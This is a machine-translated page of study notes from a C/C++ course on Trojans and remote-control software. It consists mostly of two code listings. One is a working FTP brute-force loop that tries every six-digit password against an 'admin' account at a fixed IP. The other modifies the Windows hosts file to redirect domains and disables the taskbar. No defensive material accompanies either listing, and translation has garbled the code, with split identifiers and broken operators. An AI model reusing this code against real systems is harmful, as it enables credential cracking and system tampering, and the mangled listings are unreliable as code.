C/c ++ Open Course Study Notes-Hacker code analysis and prevention, and wisdom podcast Study Notes

C/c ++ Open Course Study Notes-Hacker code analysis and prevention, and wisdom podcast Study Notes

Hacker code Analysis and Prevention notes

[Course Introduction]

C/C ++ language is similar to the underlying computer language except assembly. Currently, mainstream operating systems such as windows, linux, iOS, and Android are all written in C/C ++, therefore, many viruses and Trojans are implemented using C/C ++. The purpose of the course is to reveal the principle and Protection of Trojans and various remote control software in C language.

Course knowledge point]

1. Trojan intrusion into the system;

2. Analysis of key behaviors after Trojans intrude into the host target;

3. Trusted port and port scanning technology;

4. Remote control implementation code;

5. Use TCP, UDP, and firewall traversal technologies in malicious code;

6. 360 Network Security Protection implementation principle.

# Include <stdio. h> # include <string. h> # define CONTENT "open % s \ nuser \ n % s \ nbye \ n" int write_file (const char * ip, const char * user, const char * passwd) {FILE * p = fopen ("a.txt", "w"); if (p) {char buf [1024] = {0}; sprintf (buf, CONTENT, ip, user, passwd); fputs (buf, p); fclose (p); return 0; // If successful, return 0} return-1; // failure, -1} int main () {int I; for (I = 0; I <1000000; I ++) // assume that all passwords are composed of numbers {char pass [100] = {0}; spri Ntf (pass, "% 06d", I); // format it as a string if (write_file ("192.168.101.138", "admin", pass) = 0) {FILE * p = _ popen ("ftp-n-s: a.txt", "r"); while (! Feof (p) {char buf [1024] = {0}; fgets (buf, sizeof (buf), p); if (strncmp (buf, "230", 3) = 0) // Based on the returned value, 230 indicates success. {printf ("pass: % s \ n", pass); return 0 ;}} _ pclose (p) ;}} return 0 ;}

Function:

// Lockmask. cpp: defines the entry point of the application. // # Include "stdafx. h "# include" lockmask. h "// function/* modify the application icon vs: Replace the project name. ico file QT:. find an image. ico, whose name is changed to myapp. icob. create a text document myapp. rc. Add IDI_ICON1 icon discardable "myapp. ico "c. in myapp. add RC_FILE = myapp to the pro file. rc. After the statement is regenerated, the modification is successful. * // * The vs2013 argument does not need to be dependent on the library, projects compatible with xp -- properties -- configuration properties -- General -- platform tool set -- windwos xp project -- properties -- configuration properties -- c/c ++ -- code generation -- Runtime Library -- Multithreading (/MT ). */# include "stdafx. h "# include <stdio. h> # include <string. h> # include <Windows. h> # include <ShellAPI. h> # pragma warning (disable: 4996) void getWinVersion () // get win version {OSVERSIONINFO a;. dwOSVersionInfoSize = si Zeof (a); GetVersionEx (& a);} int setHosts (const char * IP, const char * domain) // modify the hosts file {char s [100] = {0}; GetSystemDirectoryA (s, sizeof (s )); // obtain the windows System directory char path [100] = {0}; sprintf (path, "% s \ % s", s, "\ drivers \ etc \ hosts"); char content [1024] = {0}; sprintf (content, "% s", IP, domain ); FILE * p = fopen (path, "a"); // open the hosts FILE if (p) {fputs (content, p); fclose (p); return 0 ;} return-1;} HWND getTas K () // obtain the taskbar handle {typedef HWND (WINAPI * PROCGETTASKMANWND) (void); // What is an HWND func (); Type function pointer PROCGETTASKMANWND GetTaskmanWindow; // define the function pointer variable HMODULE hUser32 = GetModuleHandleA ("user32"); // reference the user32.dll library if (! HUser32) return NULL; GetTaskmanWindow = (PROCGETTASKMANWND) GetProcAddress (hUser32, "GetTaskmanWindow"); if (! GetTaskmanWindow) return NULL; HWND h = GetTaskmanWindow (); return GetParent (h);} int APIENTRY _ tWinMain (_ In _ HINSTANCE hInstance, _ In_opt _ HINSTANCE hPrevInstance, _ In _ LPTSTR lpCmdLine, _ In _ int nCmdShow) {HWND h = getTask (); // EnableWindow (h, false ); // set the taskbar to disabled EnableWindow (h, true); // set the taskbar to available return 0 ;}